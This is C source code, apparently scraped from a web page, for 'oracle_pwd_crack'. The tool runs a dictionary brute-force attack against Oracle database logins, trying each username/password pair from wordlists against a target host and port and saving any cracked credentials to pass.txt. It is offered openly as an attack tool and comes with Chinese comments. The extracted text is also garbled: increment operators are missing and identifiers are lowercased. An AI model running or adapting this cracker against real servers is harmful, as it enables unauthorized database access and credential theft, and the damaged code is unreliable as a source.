"\t-u username specify the username of oracle\n"
// "\t-p password specify the password of oracle\n"
"\t-d dict specify the dictionary\n"
"\t-i database specify the database's name\n"
//"\t-a automode automatic crack the oracle password \n"
//"\tnote: when u use the -a option, named the username dict user.dic\n"
// "\t password dict pass.dic\n"
);
printf("\nexample: oracle_pwd_crack 127.0.0.1 -x 1521 -u sql_user.dic -d pass.dic -i plsextproc\n");
exit(1); } //创建密码链表:
passinfo * create_pass_link(int nodenum, file * dictfile){ /* read data from password dictionary, init the link */
tchar * sztemppass = null;
passinfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/ //分配内存空间在内存的动态存储区中分配一块长度为"sizeof(passinfo)"字节的连续区域,函数的返回值为该区域的首地址:
if ( (h = (passinfo *) malloc(sizeof(passinfo))) == null )
{
fprintf(stderr, "malloc failed %d", getlasterror());
exit(0);
} /* create the head node */ /* init the head node*/
h->next = null;
p = h; for ( i=0; i < nodenum; i ) //下面是建立链表,每个密码对应一个结点:
{ //按sizeof(tchar)的长度分配100块连续的区域,并把指向tchar类型指针的首地址赋予指针变量sztemppass
sztemppass = (tchar *)calloc(100, sizeof(tchar));
zeromemory(sztemppass, 100); if ( (s = (passinfo *)malloc(sizeof(passinfo))) == null)
{
fprintf(stderr, "malloc failed %d", getlasterror());
exit(0);
}
memset(s->password, '\0', 100);
fgets(sztemppass, 100, dictfile);
strncpy(s->password, sztemppass, strlen(sztemppass)-1);
s->next =null; //删除一个结点
p->next = s;//链表指针指向下一个结构地址
p = s;//下一个结构的数据域赋值 free(sztemppass);//释放内存空间 }
return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据 }
//创建用户名链表:
nameinfo * create_name_link(int nodenum, file * dictfile){ /* read data from password dictionary, init the link */
tchar * sztempname = null;
nameinfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/ //分配内存空间在内存的动态存储区中分配一块长度为"sizeof(nameinfo)"字节的连续区域,函数的返回值为该区域(此处为nameinfo结构的首地址)的首地址: :
if ( (h = (nameinfo *) malloc(sizeof(nameinfo))) == null )
{
fprintf(stdout, "malloc failed %d", getlasterror());
exit(0);
} /* create the head node */ /* init the head node*/
h->next = null; //删除下一个结点
p = h; //p里面目前指向头结点 for ( i=0; i < nodenum; i )
{//按sizeof(tchar)的长度分配100块连续的区域,并把指向tchar类型指针的首地址赋予指针变量sztemppass:
sztempname = (tchar *)calloc(100, sizeof(tchar));
zeromemory(sztempname, 100);//字符串类型变量清0 if ( (s = (nameinfo *)malloc(sizeof(nameinfo))) == null)
{
fprintf(stdout, "malloc failed %d", getlasterror());
exit(0);
}
memset(s->name, '\0', 100);
fgets(sztempname, 100, dictfile);
strncpy(s->name, sztempname, strlen(sztempname)-1);
s->next =null;
p->next = s;//p指向下一个结点的地址
p = s;//下一个结构的数据域赋值 free(sztempname); }
return h; }
int linecount(file * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0 while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline ; rewind(fd);//指针返回到文件起始处 return countline;
} bool isportopen(char * address, int port)
{
int recv = 1;
wsadata wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
bool result = false;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ulong value = 1;
//初使化winsock版本1.1:
recv = wsastartup(makeword(1,1), &wsadata); if(recv != 0)
{
printf("init failed %d.\n",wsagetlasterror());
return(0);
} if ( lobyte( wsadata.wversion ) != 1 ||
hibyte( wsadata.wversion ) != 1 ) {
/* tell the user that we couldn't find a useable */
/* winsock.dll. */
wsacleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(af_inet,sock_stream,ipproto_tcp);
if(fd < 0)
{
printf("[-] create socket error %d. \n",wsagetlasterror());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,fionbio,&value); if (!(host1 = gethostbyname(address))){
printf("[-] gethostbyname(%s) error %d.\n",address,wsagetlasterror());
return(0);
} memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =af_inet;//ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr); timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0; fd_zero(&writefd);
fd_set(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试 recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr)); if( fd_isset(fd, &writefd))
{
recv = select(fd 1, null, &writefd, null, &timer4);//测试5秒钟内是否有数据写入 if( recv > 0 )
result = true;
} closesocket(fd);
wsacleanup(); return result; }
int main(int argc, char **argv)
{ passinfo * head, * curr = null;
nameinfo * headnode, * currnode = null;
int namecount = 0, passcount = 0; /////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
//参数不为8个的时候打印帮助
if(argc != 10)
usage(); if (argc == 10)
{
if ( strcmpi(argv[2], "-x") )
usage(); if ( strcmpi(argv[4], "-u") )
usage(); if ( strcmpi(argv[6], "-d") )
usage();
if ( strcmpi(argv[8], "-i") )
usage();
} /* determinate whether the oracle port is open */
if( !isportopen(argv[1], atoi(argv[3]) ) )
{
printf("error:can't connect to %s:%d\n", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
////////////////////////////////////////////////////////////////////////////////////////////// //取得目标地址和端口号:
strcpy(target,argv[1]);
strcpy(port,argv[3]);
strcpy(db,argv[9]); if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */ file * passdic = null;
if ( (passdic = fopen(argv[7], "r")) ==null){
fprintf(stdout, "can't open the password dictionary\n");
exit(0);
}
/* count line of name dictionary */ passcount = linecount(passdic); //计算密码的数量
head = create_pass_link(passcount, passdic); /* create the password link */
curr = head ->next; //指向第一个结点 /* open the password dictionary */ file * namedict = null;
if ( (namedict = fopen(argv[5], "r")) ==null){
fprintf(stderr, "can't open the name dictionary\n");
exit(0);
} /*密码最终保存文件*/
file *passtxt=null;
if ( (passtxt = fopen("pass.txt", "at ")) ==null){
fprintf(stdout, "can't write pass.txt file!\n");
exit(0);
} /* count line of name dictionary */ namecount = linecount(namedict);//计算用户名数量
headnode = create_name_link(namecount, namedict); /* create user link */
currnode = headnode->next; int j=0,i=1;
while(currnode!=null) //为null表示姓名链表结束
{
printf("\n开始第%d位用户%s测试:\n", j,currnode->name);
while(curr != null) //为null表示密码链表结束
{
printf("now cracking %s->%s \n", currnode->name, curr->password);
fflush(null);
int cracked=0;
cracked=sqlcheck(curr->password,currnode->name);
if ( cracked==1 )
{
printf("%d.successfully:oracle server %s's username [%s] password [%s]\n",j,target,currnode->name, curr->password);
fseek(passtxt, 0l, seek_end);//移动到文件尾部
fprintf(passtxt,"%d.successfully:oracle server %s's username [%s] password [%s]\r\n",i ,target,currnode->name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->next;//移动到下一个结点
sleep(100);//暂停100ms,即0.1s } /* starting crack the oracle password*/
currnode = currnode->next;
curr = head ->next; //移到密码链表的第一个结点
}
printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount);
printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n");
fprintf(passtxt,"\r\n\r\n");
fclose(passdic);
fclose(namedict);
fclose(passtxt);
free(head);
} return 0; }